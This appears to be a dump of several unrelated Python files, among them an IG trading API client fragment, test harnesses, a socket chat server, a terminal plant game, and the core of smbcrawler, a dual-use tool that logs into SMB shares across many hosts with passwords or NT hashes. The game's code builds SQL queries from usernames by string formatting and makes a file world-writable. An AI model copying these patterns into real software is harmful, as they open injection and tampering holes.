"""Encrypt password for login"""
key, timestamp = self.get_encryption_key(session)
rsakey = RSA.importKey(b64decode(key))
string = self.IG_PASSWORD + "|" + str(int(timestamp))
message = b64encode(string.encode())
return b64encode(PKCS1_v1_5.new(rsakey).encrypt(message)).decode()
def create_session(self, session=None, encryption=False, version='2'):
"""
Creates a session, obtaining tokens for subsequent API access
** April 2021 v3 has been implemented, but is not the default for now
:param session: HTTP session
:type session: requests.Session
:param encryption: whether or not the password should be encrypted. Required for some regions
:type encryption: Boolean
:param version: API method version
:type version: str
:return: JSON response body, parsed into dict
:rtype: dict
"""
if version == '3' and self.ACC_NUMBER is None:
raise IGException('Account number must be set for v3 sessions')
logging.info(f"Creating new v{version} session for user '{self.IG_USERNAME}' at '{self.BASE_URL}'")
password = self.encrypted_password(session) if encryption else self.IG_PASSWORD
params = {"identifier": self.IG_USERNAME, "password": password}
if encryption:
params["encryptedPassword"] = True
endpoint = "/session"
action = "create"
response = self._req(action, endpoint, params, session, version, check=False)
self._manage_headers(response)
data = self.parse_response(response.text)
if self._use_rate_limiter:
self.setup_rate_limiter()
return data
def refresh_session(self, session=None, version='1'):
"""
Refreshes a v3 session. Tokens only last for 60 seconds, so need to be renewed regularly
:param session: HTTP session object
:type session: requests.Session
:param version: API method version
:type version: str
:return: HTTP status code
:rtype: int
"""
logging.info(f"Refreshing session '{self.IG_USERNAME}'")
params = {"refresh_token": self._refresh_token}
endpoint = "/session/refresh-token"
action = "create"
response = self._req(action, endpoint, params, session, version, check=False)
self._handle_oauth(json.loads(response.text))
return response.status_code
def _manage_headers(self, response):
"""
Manages authentication headers - different behaviour depending on the session creation version
:param response: HTTP response
:type response: requests.Response
"""
# handle v1 and v2 logins
handle_session_tokens(response, self.session)
# handle v3 logins
if response.text:
self.session.headers.update({'IG-ACCOUNT-ID': self.ACC_NUMBER})
payload = json.loads(response.text)
if 'oauthToken' in payload:
self._handle_oauth(payload['oauthToken'])
def _handle_oauth(self, oauth):
"""
Handle the v3 headers during session creation and refresh
:param oauth: 'oauth' portion of the response body
:type oauth: dict
"""
access_token = oauth['access_token']
token_type = oauth['token_type']
self.session.headers.update({'Authorization': f"{token_type} {access_token}"})
self._refresh_token = oauth['refresh_token']
validity = int(oauth['expires_in'])
self._valid_until = datetime.now() + timedelta(seconds=validity)
def _check_session(self):
"""
Check the v3 session status before making an API request:
- v3 tokens only last for 60 seconds
- if possible, the session can be renewed with a special refresh token
- if not, a new session will be created
"""
logging.debug("Checking session status...")
if self._valid_until is not None and datetime.now() > self._valid_until:
if self._refresh_token:
# we are in a v3 session, need to refresh
try:
logging.info("Current session has expired, refreshing...")
self.refresh_session()
except IGException:
logging.info("Refresh failed, logging in again...")
self._refresh_token = None
self._valid_until = None
del self.session.headers['Authorization']
self.create_session(version='3')
def switch_account(self, account_id, default_account, session=None):
"""Switches active accounts, optionally setting the default account"""
version = "1"
params = {"accountId": account_id, "defaultAccount": default_account}
endpoint = "/session"
action = "update"
response = self._req(action, endpoint, params, session, version)
self._manage_headers(response)
data = self.parse_response(response.text)
return data
def read_session(self, fetch_session_tokens='false', session=None):
"""Retrieves current session details"""
version = "1"
params = {"fetchSessionTokens": fetch_session_tokens}
endpoint = "/session"
action = "read"
response = self._req(action, endpoint, params, session, version)
if not response.ok:
raise IGException("Error in read_session() %s" % response.status_code)
data = self.parse_response(response.text)
return data
# -------- END -------- #
# -------- GENERAL -------- #
def get_client_apps(self, session=None):
"""Returns a list of client-owned applications"""
version = "1"
params = {}
endpoint = "/operations/application"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def update_client_app(
self,
allowance_account_overall,
allowance_account_trading,
api_key,
status,
session=None,
):
"""Updates an application"""
version = "1"
params = {
"allowanceAccountOverall": allowance_account_overall,
"allowanceAccountTrading": allowance_account_trading,
"apiKey": api_key,
"status": status,
}
endpoint = "/operations/application"
action = "update"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def disable_client_app_key(self, session=None):
"""
Disables the current application key from processing further requests.
Disabled keys may be re-enabled via the My Account section on
the IG Web Dealing Platform.
"""
version = "1"
params = {}
endpoint = "/operations/application/disable"
action = "update"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
# -------- END -------- #
def handle_session_tokens(response, session):
"""
Copy session tokens from response to headers, so they will be present for all future requests
:param response: HTTP response object
:type response: requests.Response
:param session: HTTP session object
:type session: requests.Session
"""
if "CST" in response.headers:
session.headers.update({'CST': response.headers['CST']})
if "X-SECURITY-TOKEN" in response.headers:
session.headers.update({'X-SECURITY-TOKEN': response.headers['X-SECURITY-TOKEN']})
|
test_app.py
|
import contextlib
import io
import sys
import time
import unittest
import unittest.mock
import importlib
import requests
import simple_web_server
from threading import Thread
class TestApp(unittest.TestCase):
@contextlib.contextmanager
def _capture_output(self):
new_out, new_err = io.StringIO(), io.StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
def test_app(self):
# capture output to test on
with self._capture_output() as (out, err):
importlib.reload(simple_web_server)
web_server_thread = Thread(target=simple_web_server.start_server, args=(), daemon=True)
web_server_thread.start()
# Need a delay to allow some time for the threads to start
time.sleep(2)
res = requests.get('http://localhost:9001')
# Pull info out of stdout since this app uses the cs.py log
# function. This means the logs are converted to prints and
# go to stdout
output = out.getvalue().strip()
# if the test passed, response should have the http get reply and logs
# should have captured in output
self.assertIn('Starting Server:', output)
self.assertIn('Received Get request:', output)
self.assertIn('Web Message is: Hello World from Cradlepoint router!', output)
self.assertNotIn('Exception occurred!', output)
self.assertEquals(200, res.status_code)
self.assertIn('Hello World from Cradlepoint router!', res.text)
|
app.py
|
import multiprocessing
import threading
import sys
import logging
from multiprocessing.dummy import Pool as ThreadPool
import smbcrawler.monkeypatch # noqa monkeypatch impacket scripts
from smbcrawler.io import get_targets, output_files_are_writeable, \
DataCollector
from smbcrawler.scanner import CrawlerThread
from smbcrawler.args import parse_args
from smbcrawler.log import init_log
from impacket.smbconnection import SessionError
log = None
class Login(object):
def __init__(self, username, domain, password="", hash=""):
self.username = username
self.domain = domain
self.password = password
try:
self.lmhash = hash.split(':')[0]
self.nthash = hash.split(':')[1]
except (IndexError, AttributeError):
self.nthash = ""
self.lmhash = ""
class ThreadManager(object):
"""Manages the crawler threads
:global_manager: A multiprocessing.Manager object to manage shared
variables
:total_targets: The number of total targets
:kill_app: callback function taking no arguments that communicates to
the parent app that we want to quit
"""
def __init__(self, global_manager, total_targets, kill_app, is_domain,
force):
self.total_targets = total_targets
self.kill_app = kill_app
self.is_domain = is_domain
self.force = force
self.threads = []
self.shared_vars = global_manager.dict()
self.shared_vars['scanned'] = 0
self.shared_vars['unpaused_threads'] = 0
self.shared_vars['credentials_confirmed'] = False
self.all_paused = global_manager.Event()
self.running = global_manager.Event()
self.running.set()
def pause(self):
print("Pausing threads... be patient")
self.running.clear()
self.all_paused.wait()
print("Threads paused. ", end='')
self.print_progress()
print("\ts <n>\tSkip share in thread <n>")
print("\tk <n>\tKill thread <n> and proceed with next target")
print("\tr\tResume crawler")
print("\tq\tWrite output files and quit")
print("Threads:")
for i, t in enumerate(self.threads):
host = t.target.host
print("\t%d) \\\\%s\\%s" % (
i, host, t.current_share or "",
))
self.show_menu()
def show_menu(self):
cmd = ""
commands = {
'k': self.kill_thread,
's': self.skip_share,
'q': self.quit,
'r': self.resume,
}
while True:
cmd = input("> ")
arg = None
if " " in cmd:
cmd, arg = cmd.split()[:2]
if cmd in commands.keys():
if arg:
if commands[cmd](arg):
break
else:
if commands[cmd]():
break
else:
print("Unkown command: %s" % cmd)
def skip_share(self, n=None):
if not n:
log.error("Missing argument")
return False
try:
self.threads[int(n)].skip_share()
except (IndexError, ValueError):
log.error("Invalid argument: %s" % n)
return False
self.resume()
return True
def kill_thread(self, n=None):
if not n:
log.error("Missing argument")
return False
try:
self.threads[int(n)].kill()
except (IndexError, ValueError):
log.error("Invalid argument: %s" % n)
return False
self.resume()
return True
def quit(self):
for i, t in enumerate(self.threads):
t.kill()
self.kill_app()
self.resume(msg="Quitting...")
return True
def resume(self, msg="Resuming..."):
print(msg)
self.all_paused.clear()
self.running.set()
return True
def check_paused(self, thread):
if not self.running.is_set():
self.shared_vars['unpaused_threads'] -= 1
if self.shared_vars['unpaused_threads'] == 0:
self.all_paused.set()
self.running.wait()
self.shared_vars['unpaused_threads'] += 1
def add(self, thread):
self.threads.append(thread)
self.shared_vars['unpaused_threads'] += 1
def remove(self, thread):
self.threads.remove(thread)
self.shared_vars['scanned'] += 1
self.shared_vars['unpaused_threads'] -= 1
def print_progress(self):
message = ""
if self.total_targets > 0:
scanned = self.shared_vars['scanned']
message = "Processed %d out of %d hosts (%.2f%%)" % (
scanned,
self.total_targets,
100.*scanned/self.total_targets,
)
print(message)
def report_logon_failure(self, target):
if (
not self.shared_vars['credentials_confirmed']
and not self.force
and self.is_domain
):
log.fatal("%s:%d - Logon failure; "
"aborting to prevent account lockout; "
"consider using --force to continue anyway"
% (target.host, target.port))
self.quit()
else:
log.warning("%s:%d - Logon failure" % (target.host, target.port))
def confirm_credentials(self):
self.shared_vars['credentials_confirmed'] = True
class CrawlerApp(object):
def __init__(self, global_manager, args):
self.args = args
self.sanity_check()
self.targets = get_targets(
self.args.target,
self.args.inputfilename,
self.args.timeout,
)
self.login = Login(
self.args.user,
self.args.domain,
password=self.args.password,
hash=self.args.hash,
)
self.output = DataCollector(self.args)
self.thread_manager = ThreadManager(
global_manager,
len(self.targets),
self.kill,
self.args.domain not in ['', '.'],
self.args.force,
)
self.killed = False
def kill(self):
self.killed = True
def sanity_check(self):
if not self.args.target and not self.args.inputfilename:
log.critical("You must supply a target or an input filename "
"(or both)")
exit(1)
if not output_files_are_writeable(self.args):
log.critical("Aborting because output file could not be written. "
"This is just going to waste everybody's time.")
exit(1)
if not self.args.no_output and all(x is None for x in [
self.args.outputfilename_xml,
self.args.outputfilename_json,
self.args.outputfilename_log,
self.args.outputfilename_grep,
]):
log.critical("Aborting because not output file name was given. "
"This is just going to waste everybody's time. "
"Use the -oN parameter to proceed anyway.")
exit(1)
def run(self):
t = threading.Thread(target=self.input_thread)
t.setDaemon(True)
t.start()
pool = ThreadPool(self.args.threads) # Number of threads
try:
pool.map(self.worker, self.targets)
except Exception as e:
log.exception(e)
log.fatal("Exception caught, trying to write output...")
except KeyboardInterrupt:
log.info("CTRL-C caught, "
"trying to exit gracefully and write output...")
self.thread_manager.quit()
pass
self.output.write_output()
sys.exit(0)
def read_key(self):
import termios
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
new = termios.tcgetattr(fd)
new[3] &= ~(termios.ICANON | termios.ECHO) # c_lflags
c = None
try:
termios.tcsetattr(fd, termios.TCSANOW, new)
c = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSANOW, old)
return c
def input_thread(self):
"""Runs in a separate thread and only registers key events"""
while True:
key = self.read_key()
if key == "p":
self.thread_manager.pause()
if key == " ":
self.thread_manager.print_progress()
def worker(self, target):
if self.killed:
return
thread = CrawlerThread(target, self.thread_manager, self.output,
self.login, self.args)
self.thread_manager.add(thread)
try:
thread.run()
except Exception as e:
if (isinstance(e, SessionError) and
'STATUS_LOGON_FAILURE' in str(e)):
self.thread_manager.report_logon_failure(target)
else:
if log.level == logging.DEBUG:
log.exception(e)
else:
log.error(e)
self.thread_manager.remove(thread)
def main(args=None):
parsed_args = parse_args(args)
init_log(parsed_args)
global log
log = logging.getLogger(__name__)
cmd_args = ' '.join(args or sys.argv[1:])
log.info("Starting up with these arguments: " + cmd_args)
global_manager = multiprocessing.Manager()
CrawlerApp(global_manager, parsed_args).run()
|
live_server.py
|
import logging
import multiprocessing
import os
import signal
import socket
import time
import pytest
from ._internal import deprecated
class LiveServer:
"""The helper class used to manage a live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
:param host: The host where to listen (default localhost).
:param port: The port to run application.
:param wait: The timeout after which test case is aborted if
application is not started.
"""
def __init__(self, app, host, port, wait, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.wait = wait
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker, args=(self.app, self.host, self.port)
)
self._process.daemon = True
self._process.start()
keep_trying = True
start_time = time.time()
while keep_trying:
elapsed_time = time.time() - start_time
if elapsed_time > self.wait:
pytest.fail(
"Failed to start the server after {!s} "
"seconds.".format(self.wait)
)
if self._is_ready():
keep_trying = False
def _is_ready(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((self.host, self.port))
except socket.error:
ret = False
else:
ret = True
finally:
sock.close()
return ret
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error("Failed to join the live server process: %r", ex)
return False
def __repr__(self):
return "<LiveServer listening at %s>" % self.url()
|
ssl_test.py
|
#!/usr/bin/env python
"""Tests for API client + HTTPS server integration."""
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
import io
import os
import socket
import threading
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
from http import server as http_server
import portpicker
import requests
import socketserver
from grr_api_client import api as grr_api
from grr_response_core.lib import flags
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import webauth
from grr_response_server.gui import wsgiapp_testlib
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import test_lib
class ApiSslServerTestBase(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
def setUp(self):
super(ApiSslServerTestBase, self).setUp()
key = rdf_crypto.RSAPrivateKey.GenerateKey()
key_path = os.path.join(self.temp_dir, "key.pem")
with open(key_path, "wb") as f:
f.write(key.AsPEM())
subject = issuer = x509.Name([
x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
])
cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
x509.random_serial_number()).not_valid_before(
datetime.datetime.utcnow()).not_valid_after(
datetime.datetime.utcnow() +
datetime.timedelta(days=1)).add_extension(
x509.SubjectAlternativeName(
[x509.DNSName(u"localhost")]),
critical=False,
).sign(key.GetRawPrivateKey(), hashes.SHA256(),
backends.default_backend())
self.cert_path = os.path.join(self.temp_dir, "certificate.pem")
with open(self.cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
self.config_overrider = test_lib.ConfigOverrider({
"AdminUI.enable_ssl": True,
"AdminUI.ssl_key_file": key_path,
"AdminUI.ssl_cert_file": self.cert_path,
})
self.config_overrider.Start()
self.port = portpicker.PickUnusedPort()
self.thread = wsgiapp_testlib.ServerThread(self.port)
self.thread.StartAndWaitUntilServing()
api_auth_manager.APIACLInit.InitApiAuthManager()
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.endpoint = "https://localhost:%s" % self.port
def tearDown(self):
super(ApiSslServerTestBase, self).tearDown()
self.config_overrider.Stop()
self.thread.keep_running = False
class ApiSslE2ETestMixin(object):
def testGetClientWorks(self):
# By testing GetClient we test a simple GET method.
client_urn = self.SetupClient(0)
c = self.api.Client(client_id=client_urn.Basename()).Get()
self.assertEqual(c.client_id, client_urn.Basename())
def testSearchClientWorks(self):
# By testing SearchClients we test an iterator-based API method.
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testPostMethodWorks(self):
client_urn = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
client_ref = self.api.Client(client_id=client_urn.Basename())
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
self.assertTrue(result_flow.client_id)
def testDownloadingFileWorks(self):
client_urn = self.SetupClient(0)
fixture_test_lib.ClientFixture(client_urn, self.token)
out = io.BytesIO()
self.api.Client(client_id=client_urn.Basename()).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertTrue(out.getvalue())
class ApiSslWithoutCABundleTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_urn.Basename()).Get()
class ApiSslWithEnvVarWithoutMergingTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint, trust_env=False)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_urn.Basename()).Get()
class ApiSslWithConfigurationInEnvVarsE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).setUp()
self.prev_environ = dict(os.environ)
os.environ["REQUESTS_CA_BUNDLE"] = self.cert_path
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
def tearDown(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).tearDown()
os.environ.clear()
os.environ.update(self.prev_environ)
class ApiSslWithWithVerifyFalseE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyFalseE2ETest, self).setUp()
self.api = grr_api.InitHttp(api_endpoint=self.endpoint, verify=False)
class ApiSslWithWithVerifyPointingToCABundleTest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyPointingToCABundleTest, self).setUp()
self.api = grr_api.InitHttp(
api_endpoint=self.endpoint, verify=self.cert_path)
class Proxy(http_server.SimpleHTTPRequestHandler):
requests = []
def do_CONNECT(self): # pylint: disable=invalid-name
self.__class__.requests.append(self.requestline)
class TCPServerV6(socketserver.TCPServer):
address_family = socket.AF_INET6
class ApiSslProxyTest(ApiSslServerTestBase):
def setUp(self):
super(ApiSslProxyTest, self).setUp()
attempts_count = 0
self.proxy_server = None
while self.proxy_server is None:
try:
self.proxy_port = portpicker.PickUnusedPort()
self.proxy_server = TCPServerV6(("::", self.proxy_port), Proxy)
except socket.error:
attempts_count += 1
if attempts_count == 10:
self.fail("Can't initialize proxy server.")
threading.Thread(target=self.proxy_server.serve_forever).start()
def tearDown(self):
super(ApiSslProxyTest, self).tearDown()
self.proxy_server.shutdown()
self.proxy_server.server_close()
def testProxyConnection(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(
api_endpoint=self.endpoint,
proxies={"https": "localhost:%d" % self.proxy_port})
with self.assertRaises(requests.exceptions.ConnectionError):
api.Client(client_id=client_urn.Basename()).Get()
# CONNECT request should point to GRR SSL server.
self.assertEqual(Proxy.requests,
["CONNECT localhost:%d HTTP/1.0" % self.port])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
soal1.py
|
import random
import time
import multiprocessing
def SoalA():
for i in range(10,20):
if i%2 == 1:
print("==Proses 1=>-----",i)
time.sleep(random.randrange(1,2))
def SoalB():
for i in range(2,12):
for o in range(2,i):
if i%o == 0:
break
else:
print("==Proses 2=>--------",i)
time.sleep(random.randrange(1,2))
def SoalC():
for i in range(50,60):
if i%2==1:
print("==Proses 3=>-----------",i)
time.sleep(random.randrange(1,2))
def SoalD():
for i in range(0,5):
print("==Proses 4=>--------------",random.randrange(100,200))
time.sleep(random.randrange(1,2))
if __name__ == "__main__":
worker1 = multiprocessing.Process(target=SoalA)
worker2 = multiprocessing.Process(target=SoalB)
worker3 = multiprocessing.Process(target=SoalC)
worker4 = multiprocessing.Process(target=SoalD)
worker1.start()
worker2.start()
worker3.start()
worker4.start()
worker1.join()
worker2.join()
worker3.join()
worker4.join()
|
server.py
|
import socket
import time
from threading import Thread
users = []
len_сhar = 8 # количество байт для кодирования количества символов в строке
len_name = 10 # максимальный размер логина
len_sec = 16 # количество байт для кодирования секунд
ip = '127.0.0.1'
port = 7777
def creation_sock():
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((ip, port))
server_socket.listen()
print("Старт сервера")
while True:
user_sock, user_ip = server_socket.accept()
Thread(target=new_connection, args=(user_sock, user_ip, )).start()
def current_time(sec):
current_time = time.strftime('%H:%M', time.localtime(sec))
return current_time
def new_connection(user_sock, user_ip):
users.append(user_sock)
print(f"К нам подключился новый юзер {user_ip[0]}:{user_ip[1]}")
accept_and_send_a_message(user_sock, user_ip)
def check_length(socket, content, length):
while len(content) < length:
content += socket.recv(length - len(content))
if length == len(content):
break
def get_message(user_sock):
while True:
try:
header = user_sock.recv(len_сhar + len_name)
except Exception:
return
if not header:
return
check_length(user_sock, header, len_сhar + len_name)
header = header.decode('utf-8')
header_len_char = header[:len_сhar]
try:
int(header_len_char)
except ValueError:
continue
header_len_char = int(header_len_char)
header_name = header[len_сhar:].strip()
message = user_sock.recv(header_len_char)
check_length(user_sock, message, header_len_char)
message = message.decode('utf-8')
return {"len": header_len_char, "name": header_name, "time": message}
def accept_and_send_a_message(user_sock, user_ip):
while True:
message = get_message(user_sock)
sec = int(time.time())
server_formatted_time = current_time(sec)
if not message:
user_sock.shutdown(socket.SHUT_WR)
user_sock.close()
print(f"Пользователь отключился {user_ip[0]}:{user_ip[1]}")
users.remove(user_sock)
return
print(f"Получено {message['name']} {server_formatted_time}: {message['time']}")
header_to_send = f"{message['len']:<{len_сhar}}{message['name']:<{len_name}}{sec:<{len_sec}}"
message_to_send = header_to_send + message['time']
message_to_send = message_to_send.encode('utf-8')
for user in users:
if user != user_sock:
try:
user.send(message_to_send)
except Exception:
user.close()
users.remove(user)
continue
def main():
creation_sock()
if __name__ == '__main__':
main()
|
botany.py
|
#!/usr/bin/python2
from __future__ import division
import time
import pickle
import json
import os
import random
import getpass
import threading
import errno
import uuid
import sqlite3
from menu_screen import *
# TODO:
# - Switch from personal data file to table in DB
class Plant(object):
# This is your plant!
stage_list = [
'seed',
'seedling',
'young',
'mature',
'flowering',
'seed-bearing',
]
color_list = [
'red',
'orange',
'yellow',
'green',
'blue',
'indigo',
'violet',
'white',
'black',
'gold',
'rainbow',
]
rarity_list = [
'common',
'uncommon',
'rare',
'legendary',
'godly',
]
species_list = [
'poppy',
'cactus',
'aloe',
'venus flytrap',
'jade plant',
'fern',
'daffodil',
'sunflower',
'baobab',
'lithops',
'hemp',
'pansy',
'iris',
'agave',
'ficus',
'moss',
'sage',
'snapdragon',
'columbine',
'brugmansia',
'palm',
'pachypodium',
]
mutation_list = [
'',
'humming',
'noxious',
'vorpal',
'glowing',
'electric',
'icy',
'flaming',
'psychic',
'screaming',
'chaotic',
'hissing',
'gelatinous',
'deformed',
'shaggy',
'scaly',
'depressed',
'anxious',
'metallic',
'glossy',
'psychedelic',
'bonsai',
'foamy',
'singing',
'fractal',
'crunchy',
'goth',
'oozing',
'stinky',
'aromatic',
'juicy',
'smug',
'vibrating',
'lithe',
'chalky',
'naive',
'ersatz',
'disco',
'levitating',
'colossal',
'luminous',
'cosmic',
'ethereal',
]
def __init__(self, this_filename, generation=1):
# Constructor
self.plant_id = str(uuid.uuid4())
self.life_stages = (3600*24, (3600*24)*3, (3600*24)*10, (3600*24)*20, (3600*24)*30)
# self.life_stages = (2, 4, 6, 8, 10) # debug mode
self.stage = 0
self.mutation = 0
self.species = random.randint(0,len(self.species_list)-1)
self.color = random.randint(0,len(self.color_list)-1)
self.rarity = self.rarity_check()
self.ticks = 0
self.age_formatted = "0"
self.generation = generation
self.dead = False
self.write_lock = False
self.owner = getpass.getuser()
self.file_name = this_filename
self.start_time = int(time.time())
self.last_time = int(time.time())
# must water plant first day
self.watered_timestamp = int(time.time())-(24*3600)-1
self.watered_24h = False
self.visitors = []
def migrate_properties(self):
# Migrates old data files to new
if not hasattr(self, 'generation'):
self.generation = 1
if not hasattr(self, 'visitors'):
self.visitors = []
def parse_plant(self):
# Converts plant data to human-readable format
output = ""
if self.stage >= 3:
output += self.rarity_list[self.rarity] + " "
if self.mutation != 0:
output += self.mutation_list[self.mutation] + " "
if self.stage >= 4:
output += self.color_list[self.color] + " "
output += self.stage_list[self.stage] + " "
if self.stage >= 2:
output += self.species_list[self.species] + " "
return output.strip()
def rarity_check(self):
# Generate plant rarity
CONST_RARITY_MAX = 256.0
rare_seed = random.randint(1,CONST_RARITY_MAX)
common_range = round((2/3)*CONST_RARITY_MAX)
uncommon_range = round((2/3)*(CONST_RARITY_MAX-common_range))
rare_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range))
legendary_range = round((2/3)*(CONST_RARITY_MAX-common_range-uncommon_range-rare_range))
common_max = common_range
uncommon_max = common_max + uncommon_range
rare_max = uncommon_max + rare_range
legendary_max = rare_max + legendary_range
godly_max = CONST_RARITY_MAX
if 0 <= rare_seed <= common_max:
rarity = 0
elif common_max < rare_seed <= uncommon_max:
rarity = 1
elif uncommon_max < rare_seed <= rare_max:
rarity = 2
elif rare_max < rare_seed <= legendary_max:
rarity = 3
elif legendary_max < rare_seed <= godly_max:
rarity = 4
return rarity
def dead_check(self):
# if it has been >5 days since watering, sorry plant is dead :(
time_delta_watered = int(time.time()) - self.watered_timestamp
if time_delta_watered > (5 * (24 * 3600)):
self.dead = True
return self.dead
def update_visitor_db(self, visitor_names):
game_dir = os.path.dirname(os.path.realpath(__file__))
garden_db_path = os.path.join(game_dir, 'sqlite/garden_db.sqlite')
conn = sqlite3.connect(garden_db_path)
for name in (visitor_names):
c = conn.cursor()
c.execute("SELECT * FROM visitors WHERE garden_name = '{}' AND visitor_name = '{}' ".format(self.owner, name))
data=c.fetchone()
if data is None:
sql = """ INSERT INTO visitors (garden_name,visitor_name,weekly_visits) VALUES('{}', '{}',1)""".format(self.owner, name)
c.execute(sql)
else:
sql = """ UPDATE visitors SET weekly_visits = weekly_visits + 1 WHERE garden_name = '{}' AND visitor_name = '{}'""".format(self.owner, name)
c.execute(sql)
conn.commit()
conn.close()
def guest_check(self):
user_dir = os.path.expanduser("~")
botany_dir = os.path.join(user_dir,'.botany')
visitor_filepath = os.path.join(botany_dir,'visitors.json')
guest_timestamps = []
visitors_this_check = []
if os.path.isfile(visitor_filepath):
with open(visitor_filepath, 'r') as visitor_file:
data = json.load(visitor_file)
if data:
for element in data:
if element['user'] not in self.visitors:
self.visitors.append(element['user'])
if element['user'] not in visitors_this_check:
visitors_this_check.append(element['user'])
# prevent users from manually setting watered_time in the future
if element['timestamp'] < int(time.time()):
guest_timestamps.append(element['timestamp'])
try:
self.update_visitor_db(visitors_this_check)
except:
pass
with open(visitor_filepath, 'w') as visitor_file:
visitor_file.write('[]')
else:
with open(visitor_filepath, mode='w') as f:
json.dump([], f)
os.chmod(visitor_filepath, 0666)
if not guest_timestamps:
return self.watered_timestamp
all_timestamps = [self.watered_timestamp] + guest_timestamps
all_timestamps.sort()
# calculate # of days between each guest watering
timestamp_diffs = [(j-i)/86400.0 for i, j in zip(all_timestamps[:-1], all_timestamps[1:])]
# plant's latest timestamp should be set to last timestamp before a
# gap of 5 days
last_valid_element = next((x for x in timestamp_diffs if x > 5), None)
if not last_valid_element:
# all timestamps are within a 5 day range, can just use latest one
return all_timestamps[-1]
last_valid_index = timestamp_diffs.index(last_valid_element)
# slice list to only include up until a >5 day gap
valid_timestamps = all_timestamps[:last_valid_index + 1]
return valid_timestamps[-1]
def water_check(self):
self.watered_timestamp = self.guest_check()
self.time_delta_watered = int(time.time()) - self.watered_timestamp
if self.time_delta_watered <= (24 * 3600):
if not self.watered_24h:
self.watered_24h = True
return True
else:
self.watered_24h = False
return False
def mutate_check(self):
# Create plant mutation
# Increase this # to make mutation rarer (chance 1 out of x each second)
CONST_MUTATION_RARITY = 20000
mutation_seed = random.randint(1,CONST_MUTATION_RARITY)
if mutation_seed == CONST_MUTATION_RARITY:
# mutation gained!
mutation = random.randint(0,len(self.mutation_list)-1)
if self.mutation == 0:
self.mutation = mutation
return True
else:
return False
def growth(self):
# Increase plant growth stage
if self.stage < (len(self.stage_list)-1):
self.stage += 1
def water(self):
# Increase plant growth stage
if not self.dead:
self.watered_timestamp = int(time.time())
self.watered_24h = True
def start_over(self):
# After plant reaches final stage, given option to restart
# increment generation only if previous stage is final stage and plant
# is alive
if not self.dead:
next_generation = self.generation + 1
else:
# Should this reset to 1? Seems unfair.. for now generations will
# persist through death.
next_generation = self.generation
self.write_lock = True
self.kill_plant()
while self.write_lock:
# Wait for garden writer to unlock
# garden db needs to update before allowing the user to reset
pass
if not self.write_lock:
self.__init__(self.file_name, next_generation)
def kill_plant(self):
self.dead = True
def unlock_new_creation(self):
self.write_lock = False
def start_life(self):
# runs life on a thread
thread = threading.Thread(target=self.life, args=())
thread.daemon = True
thread.start()
def life(self):
# I've created life :)
while True:
if not self.dead:
if self.watered_24h:
self.ticks += 1
if self.stage < len(self.stage_list)-1:
if self.ticks >= self.life_stages[self.stage]:
self.growth()
if self.mutate_check():
pass
if self.water_check():
# Do something
pass
if self.dead_check():
# Do something else
pass
# TODO: event check
generation_bonus = 0.2 * (self.generation - 1)
